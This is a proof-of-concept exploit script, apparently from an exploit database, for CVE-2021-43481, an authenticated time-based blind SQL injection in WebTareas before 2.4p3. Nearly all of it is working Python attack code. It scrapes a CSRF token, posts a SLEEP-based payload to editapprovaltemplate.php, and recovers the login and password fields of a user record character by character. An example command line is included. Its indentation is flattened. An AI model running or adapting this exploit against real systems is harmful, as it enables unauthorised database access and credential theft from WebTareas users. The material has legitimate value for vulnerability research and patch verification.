# Exploit Title: WebTareas 2.4 - Blind SQLi (Authenticated)
# Date: 04/20/2022
# Exploit Author: Behrad Taher
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Version: < 2.4p3
# CVE : CVE-2021-43481
#The script takes 3 arguments: IP, user ID, session ID
#Example usage: python3 webtareas_sqli.py 127.0.0.1 1 4au5376dddr2n2tnqedqara89i
import requests, time, sys
from bs4 import BeautifulSoup
ip = sys.argv[1]
id = sys.argv[2]
sid = sys.argv[3]
def sqli(column):
print("Extracting %s from user with ID: %s\n" % (column,id))
extract = ""
for i in range (1,33):
#This conditional statement will account for variable length usernames
if(len(extract) < i-1):
break
for j in range(32,127):
injection = "SELECT 1 and IF(ascii(substring((SELECT %s FROM gW8members WHERE id=1),%d,1))=%d,sleep(5),0);" % (column,i,j)
url = "http://%s/approvals/editapprovaltemplate.php?id=1" % ip
GET_cookies = {"webTareasSID": "%s" % sid}
r = requests.get(url, cookies=GET_cookies)
#Because the app has CSRF protection enabled we need to send a get request each time and parse out the CSRF Token"
token = BeautifulSoup(r.text,features="html.parser").find('input', {'name':'csrfToken'})['value']
#Because this is an authenticated vulnerability we need to provide a valid session token
POST_cookies = {"webTareasSID": "%s" % sid}
POST_data = {"csrfToken": "%s" % token, "action": "update", "cd": "Q", "uq": "%s" % injection}
start = time.time()
requests.post(url, cookies=POST_cookies, data=POST_data)
end = time.time() - start
if end > 5:
extract += chr(j)
print ("\033[A\033[A")
print(extract)
break
#Modularized the script for login and password values
sqli("login")
sqli("password")
